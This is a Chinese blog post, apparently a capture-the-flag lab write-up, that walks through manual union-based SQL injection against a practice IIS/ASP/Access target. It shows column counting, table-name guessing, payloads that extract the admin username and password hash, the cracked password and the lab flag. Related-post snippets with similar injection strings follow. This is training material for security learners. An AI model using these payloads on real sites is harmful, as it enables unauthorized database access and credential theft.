SQL手工注入漏洞测试(Access数据库)-墨者

原创 于 2023-12-06 23:01:34 发布 · 882 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #sql #解题思路 #解题步骤

安全工程师通过搭建IIS+ASP+Access靶场练习SQL注入,学习了猜列、测试显位、利用Access特性进行盲注和字典攻击。最终目标是获取管理密码,整个过程难度适中。

———靶场专栏———

声明:文章由作者weoptions学习或练习过程中的步骤及思路,非正式答案,仅供学习和参考。

靶场背景:

来源:

        墨者学院

简介:

        安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标:

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解Access的数据结构;
4.了解字符串的MD5加解密;

解题方向:

        手工进行SQL注入测试,获取管理密码登录。

解题思路:

        先按mysql思路来整吧,先猜列,然后查库,然后找数据。

解题步骤:

        

        一、猜列

new_list.asp?id=1 order by 4

order by 5的时候显示不正常,order by 4的时候显示正常。说明有四个字段。

        二、测试显位

new_list.asp?id=-2 union select 1,2,3,4

昂?啥也不显示,让盲注吗?找找资料先。哦哦哦,得先猜表名。

由于Access数据库特性招致sql注入是需要借助字典去猜解表明和列名。

如果猜解不到,可以自定义社工字典或者采用偏移注入。

/new_list.asp?id=-2 union select 1,2,3,4 from admin

显位在二和三。

直接猜名字和密码吧

new_list.asp?id=-2 union select 1,username,passwd,4 from admin

moke,7e6ec4fadf84938f(MD5解密后为27737201)

登陆后拿到KEY: mozhe8e380717a06636d76e5babba688

总结:

        难度:★★★★☆☆☆☆☆☆

        解析:难度不大,记录一下

墨者学院 - SQL手工注入漏洞测试(Access数据库)
多崎巡礼的博客
07-26 1033
进入公告找到注入点 地址输入 and 1=1 =1正常,and 1=2 出现报错说明有注入点。 3.猜测存在的表,and exists (select * from admin),我这里凭借着经验猜出来是admin表,如果不是的话可以继续猜,格式为:and exists (select * from 表名),运行不报错,说明就是存在这个admin表了。 4.猜测这个表里面有哪些字段:order ...
SQL手工注入漏洞测试(Access数据库)
Fisher
12-13 1388
1.判断数据库 首先拿到手依然是找注入点,此题注入点id=1,已经找到接着进行判断数据库类型,当然我们已经找到这个数据库access,但是我们仍然需要判断一下。具体参照https://blog.youkuaiyun.com/happyorange2014/article/details/49754951这个博客写的异常好,介绍了怎么判断access数据库。 试了一下最好用的还是用len()和chr()函数进行判断 chr(65)='A’,发现界面正确,说明可以用chr()函数 接下可以看出来len(‘a’)=1.l
【Web】SQL手工注入Sql Server数据库 (漏洞测试)
HAPPY
07-30 3948
            【Web】SQL手工注入Sql Server数据库 (漏洞测试) 第一步:判断是否有注入,?id=2 and 1=1   正确;id=2 and 1=2  错误,得出有注入点。第二步:判断数据库类型:?id=2  and  exists (select  *  from  sysobjects) 显示正常, 表示是ms sql server数据库。 第三步:sqlmap...
墨者靶场-SQL手工注入漏洞测试(Access数据库)
Sa1nZen的博客
08-26 386
墨者靶场-SQL手工注入漏洞测试(Access数据库)
墨者 - SQL手工注入漏洞测试(Access数据库)
吃肉唐僧的博客
07-05 780
order by 1 ,有回显,存在注入点 new_list.asp?id=1 and exists(select * from admin)测试是否存在admin,纯靠猜...... 存在admin表,接下来测回显位置 /new_list.asp?id=1 union select 1,2,3,4 from admin 接下来猜字段值,and exists ...
SQL手工注入漏洞测试-MongoDB数据库注入-Access数据库注入-PostgreSQL数据库注入-Sql Server数据库注入-Oracle数据库注入
网络空间安全学习
08-15 427
SQL注入手工测试: MongoDB数据库注入-Access数据库注入-PostgreSQL数据库注入-Sql Server数据库注入-Oracle数据库注入
SQL手工注入漏洞测试Access数据库墨者学院靶场)
ISNS的博客
07-09 1604
靶场: https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe 1.点击滚动的通知。 点击后进入页面: 2.判断是否为注入点。 3.判断字段数量。 采用二分法,从10开始查询。结果显示有4个字段: 因为Access用联合语句显示可显字段时,必须要“from 表名”,所以需要先猜表名。 4.猜...
墨者学院--SQL手工注入漏洞测试(Access数据库)
YYYYYcici的博客
05-18 990
墨者学院–SQL手工注入漏洞测试(Access数据库) 靶场连接: 解题思路: 判断是否存在sql注入 利用order by判断字段数量 联合注入猜测表名 联合注入猜测列名 登陆,拿KEY 打开题目,页面如下所示 一、 点击蓝色划线区域,跳转下一正常页面(跳转页面出现id=1) 二、判断存在注入(/ 、-0 、 and 1=1) 三、判断字段数量(order by...
墨者靶场 入门:SQL手工注入漏洞测试Access数据库
qq_43233085的博客
01-10 1332
入门:SQL手工注入漏洞测试Access数据库)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5...
墨者学院-SQL手工注入漏洞测试(Access数据库)
JimWu的博客
09-04 761
SQL手工注入漏洞测试(Access数据库) 难易程度:★ 题目类型:SQL注入 使用工具:FireFox浏览器 1.打开靶场,寻找注入点。 确定了公告页面可以注入。 2.输入id=1 and 1=1,返回正常页面。 输入id=1 and 1=2,则返回空白页。 3.猜测数据库的表名,输入id=1 and exists(select * from admin),返回正常页面,证明猜对了。 4...
SQL注入Access注入手工
12-14
什么是SQL注入SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 —-百度百科 寻找注入点 首先呢,在网站中寻找传递参数的页面,也就是寻找注入点。 判断注入 找到页面(注入点)之后呢,我们需要判断当前页面是否存在注入 传统的方法是: 语句 状态 链接后面加 ’ 报错 and 1=1 正常 and 1=2 报错 or 1=2 正常 or 1=1
墨者学院SQL手工注入漏洞测试(MySQL数据库)
最新发布
12-29
### MySQL数据库中的SQL手工注入漏洞测试方法 #### 测试前准备 为了安全有效地进行SQL注入测试,建议在一个受控环境中操作。通常会搭建一个包含Nginx、PHP以及MySQL的靶场环境,在此环境下可以自由尝试各种攻击向量...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weoptions

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值